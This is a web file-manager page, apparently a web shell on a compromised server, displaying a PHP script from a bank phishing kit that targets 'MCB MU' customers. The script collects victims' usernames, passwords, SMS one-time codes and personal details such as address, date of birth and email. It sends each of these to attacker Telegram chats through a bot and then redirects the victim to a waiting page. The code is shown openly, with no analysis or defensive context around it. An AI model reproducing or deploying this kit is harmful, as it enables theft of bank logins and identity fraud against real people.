Файловый менеджер - Редактировать - /home/iss2024/rasgpinc.com/AEbmcbx/app/send.php
Ðазад
<?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ @session_start(); require '../config.php'; $ip = $_SERVER['REMOTE_ADDR']; $panel_link = str_replace("app/send.php", "panel/ctr.php", "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."?ip=$ip"); function hit($link){ $c = curl_init(); curl_setopt($c, CURLOPT_URL, $link); curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); return curl_exec($c); curl_close($c); } if(isset($_POST['USERNAME'])) if(isset($_POST['PASSWORD'])){ $text = urlencode(" | MCB MU Login - $ip +-------------------------------------------------- | User : ".$_POST['USERNAME']." | Pass : ".$_POST['PASSWORD']." +-------------------------------------------------- | PANEL LINK : $panel_link "); foreach($chat_ids as $id){ $link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text"; hit($link); } header("location: wait.php"); } if(isset($_POST['tan'])){ $text = urlencode(" | MCB MU SMS - $ip +-------------------------------------------------- | Sms : ".$_POST['tan']." +-------------------------------------------------- | PANEL LINK : $panel_link "); foreach($chat_ids as $id){ $link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text"; hit($link); } header("location: wait.php"); } if(isset($_POST['cc1'])){ $text = urlencode(" | MCB MU INFO - $ip +-------------------------------------------------- | Full Name : ".$_POST['cc1']." | Home Address : ".$_POST['add']." | Date of Birth : ".$_POST['dob']." | Phone Number : ".$_POST['cvv']." | Email Address : ".$_POST['email']." +-------------------------------------------------- | PANEL LINK : $panel_link "); foreach($chat_ids as $id){ $link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text"; hit($link); } header("location: wait.php"); } ?>
| ver. 1.1 | |
.
| PHP 8.4.21 | Ð“ÐµÐ½ÐµÑ€Ð°Ñ†Ð¸Ñ Ñтраницы: 0 |
proxy
|
phpinfo
|
ÐаÑтройка